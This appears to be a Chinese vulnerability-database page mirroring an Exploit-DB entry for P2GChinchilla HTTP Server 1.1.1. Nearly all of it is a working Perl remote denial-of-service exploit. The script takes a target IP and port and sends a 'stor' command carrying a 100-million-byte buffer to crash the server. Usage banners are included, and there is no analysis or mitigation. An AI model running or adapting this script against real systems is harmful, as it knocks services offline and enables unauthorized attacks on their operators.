P2GChinchilla HTTP Server 1.1.1 - Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059096 漏洞类型
发布时间 2010-01-24 更新时间 2010-01-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11254
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
# File Name :P2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Auther : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
# 
##==------>>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==------>> 
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t+================================================================+\n";
print "\t+ ---  P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service  ---+\n";
print "\t+ ---  Author :Zer0 Thunder                                   ---+\n";
print "\t+ ---  DATE:  :[24/01/2010]                                   ---+\n";
print "\t+ ---  ------------------------------------------------       ---+\n";
print "\t+ ---  Usage  :perl exploit.pl [Host/Remote IP] [Port]        ---+\n";
print "\t+ ---                                                         ---+\n";
print "\t+================================================================+\n";
print "\n"; 
print " Ex : exploit.pl localhost 50000\n";  # P2GChinchilla Default Port is 50000
 
 
exit;
}
 
print "\t+================================================================+\n";
print "\t+ ---  P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service  ---+\n";
print "\t+ ---  Author :Zer0 Thunder                                   ---+\n";
print "\t+ ---  DATE:  :[24/01/2010]                                   ---+\n";
print "\t+ ---  ------------------------------------------------       ---+\n";
print "\t+ ---  Usage  :perl exploit.pl [Host/Remote IP] [Port]        ---+\n";
print "\t+ ---                                                         ---+\n";
print "\t+================================================================+\n";
print "\n";  
print " Wait Till The Buffer is Done\n"; 
my $b1 = "\x41" x 100000000;
print "\n";
print " DoS is UP !.. N Give it a Second \n";

$DoS=IO::Socket::INET->new("$ip:$port") or die;

print $DoS "stor $b1\n";
print $DoS "QUIT\n";
 
close $DoS;

# exit :